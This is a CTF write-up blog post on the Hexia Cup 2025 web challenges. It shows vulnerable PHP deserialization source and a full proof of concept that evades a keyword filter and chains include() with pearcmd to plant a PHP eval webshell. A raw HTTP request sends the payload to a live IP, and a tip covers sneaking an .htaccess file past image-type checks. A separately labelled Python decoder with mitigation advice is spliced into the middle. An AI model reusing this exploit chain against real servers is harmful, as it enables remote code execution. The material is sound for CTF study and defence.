First 贺夏杯 (Hexia Cup) CTF 2025: Web

OneZ3r0 Lv3

Preface

Good challenges! Not many people played, but the quality of the problems was genuinely solid.

Uns3rialize

Source

<?php
highlight_file(__FILE__);
class User
{
    public $username;
    public $value;
    public function exec($unser)
    {
        // re-serialize the decoded value and compare it loosely with the stored string
        $ser = serialize($unser);
        if ($ser != $this->value) {
            $key1 = $unser[0];
            $key2 = $unser[1];
            // include() path is built from unserialized, user-controlled values
            include ($key1 . 'd1no_ctf' . $key2.'.php');
        }
    }
    public function __destruct()
    {
        if ($this->username == "admin") {
            $unser = unserialize($this->value);
            $this->exec($unser);
        }
    }
}
$ser = $_POST["user"];
// keyword filter applied to the raw serialized string, before decoding
if (strpos($ser, 'admin') !== false) {
    exit ("no way!!!!");
}
$user = unserialize($ser);
throw new Exception("noooooob!!!");

PoC

<?php
class User
{
    public $username;
    public $value;
}

$user = new User();
$user->username = 'admin';

$evil = new User();
$v = serialize($evil);

$k1 = '../../../../';
$k2 = '../../../../../usr/local/lib/php/pearcmd';

$payload_in = serialize(array($v, $k1, $k2));
$payload_in = str_replace('i:1;','i:0;',$payload_in);
$payload_in = str_replace('i:2;','i:1;',$payload_in);

$user->value = $payload_in;

$payload_out = serialize(array($user, 0));
$payload_out = str_replace('s:5:"admin";','S:5:"\61dmin";',$payload_out);
$payload_out = str_replace('i:1;i:0;}','i:0;i:0;}',$payload_out);

var_dump($payload_out);

/*
GET ?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd'])?>+/var/www/html/onez3r0.php
POST user=$payload_out
*/
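As an added illustration (not part of the original writeup) of why the strpos filter and the serialize() round-trip check in the source can both be passed: a small Python decoder for PHP's serialize() format that handles 'S:' hex-escaped strings and repeated array keys. The SAMPLE payload is constructed for this example; filter_hits returns the challenge's raw substring check next to the same check run over the decoded strings.

```python
# Decoder for PHP's serialize() format, added to show two properties the challenge
# relies on: an 'S:' string may spell bytes as \xx hex escapes ("\61dmin" decodes to
# "admin", so a substring filter on the raw input never sees it), and a repeated array
# key means the earlier value is built, then discarded, during unserialize().
SAMPLE = 'a:2:{i:0;O:4:"User":2:{s:8:"username";S:5:"\\61dmin";s:5:"value";N;}i:0;i:9;}'

def _until(data, pos, stop):
    end = data.index(stop, pos)
    return data[pos:end], end + 1

def parse(data, pos=0, seen=None):
    """Return (value, next_pos); every decoded string is also appended to `seen`."""
    seen = [] if seen is None else seen
    t = data[pos]
    if t == 'N': return None, pos + 2               # N;
    if t == 'i':                                    # i:<int>;
        num, pos = _until(data, pos + 2, ';')
        return int(num), pos
    if t in 'sS':                                   # s:<len>:"...";  S:<len>:"...";
        length, pos = _until(data, pos + 2, ':')
        pos, chars = pos + 1, []                    # skip the opening quote
        while len(chars) < int(length):
            if t == 'S' and data[pos] == '\\':      # \xx escape counts as one byte
                chars.append(chr(int(data[pos + 1:pos + 3], 16)))
                pos += 3
            else:
                chars.append(data[pos])
                pos += 1
        seen.append(''.join(chars))
        return seen[-1], pos + 2                    # skip closing quote and ';'
    if t in 'aO':                                   # a:<n>:{..}  O:<len>:"Cls":<n>:{..}
        out = {}
        if t == 'O':
            name_len, pos = _until(data, pos + 2, ':')
            out['__class'] = data[pos + 1:pos + 1 + int(name_len)]
            pos += int(name_len) + 3                # class name, both quotes and ':'
        else:
            pos += 2
        count, pos = _until(data, pos, ':')
        pos += 1                                    # skip '{'
        for _ in range(int(count)):
            key, pos = parse(data, pos, seen)
            out[key], pos = parse(data, pos, seen)  # repeated key: last one wins, as in PHP
        return out, pos + 1                         # skip '}'
    raise ValueError(f'unsupported token {t!r} at offset {pos}')

def filter_hits(serialized, token):
    """(raw, decoded): the strpos-style check on the input vs. the same check on decoded strings."""
    seen = []
    parse(serialized, 0, seen)
    return token in serialized, any(token in s for s in seen)
```

The decoded check is only a detection aid; the mitigation is not to unserialize() user input at all, or at minimum to pass ['allowed_classes' => false] and validate any include path against an allow-list.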

Honestly, you have to send it with Burp; otherwise the browser URL-encodes the <> and the request is useless.

POST /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd'])?>+/var/www/html/onez3r0.php HTTP/1.1
Host: 110.42.47.237:33440
Content-Length: 444
Cache-Control: max-age=0
Origin: http://110.42.47.237:33440
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://110.42.47.237:33440/?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/%3C?=phpinfo();?%3E+/var/www/html/onez3r0.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7
Connection: keep-alive

user=a:2:{i:0;O:4:"User":2:{s:8:"username";S:5:"\61dmin";s:5:"value";s:152:"a:3:{i:0;s:58:"O:4:"User":2:{s:8:"username";S:5:"\61dmin";s:5:"value";N;}";i:0;s:12:"../../../../";i:1;s:40:"../../../../../usr/local/lib/php/pearcmd";}";}i:0;i:9;}

There was also a nice file-upload challenge, I forget its name, but it was the one combining the .htaccess format with a GIF89a file header.

XBM is a text format, so it can be written into an .htaccess file to get past exif_imagetype().

https://blog.csdn.net/2401_86190146/article/details/146176497

  • Title: First 贺夏杯 (Hexia Cup) CTF 2025: Web
  • Author: OneZ3r0
  • Created: 2025-05-23 17:50:24
  • Updated: 2025-07-29 18:03:58
  • Link: https://blog.onez3r0.top/2025/05/23/d1noctf-2025/
  • License: This article is licensed under CC BY-NC-SA 4.0.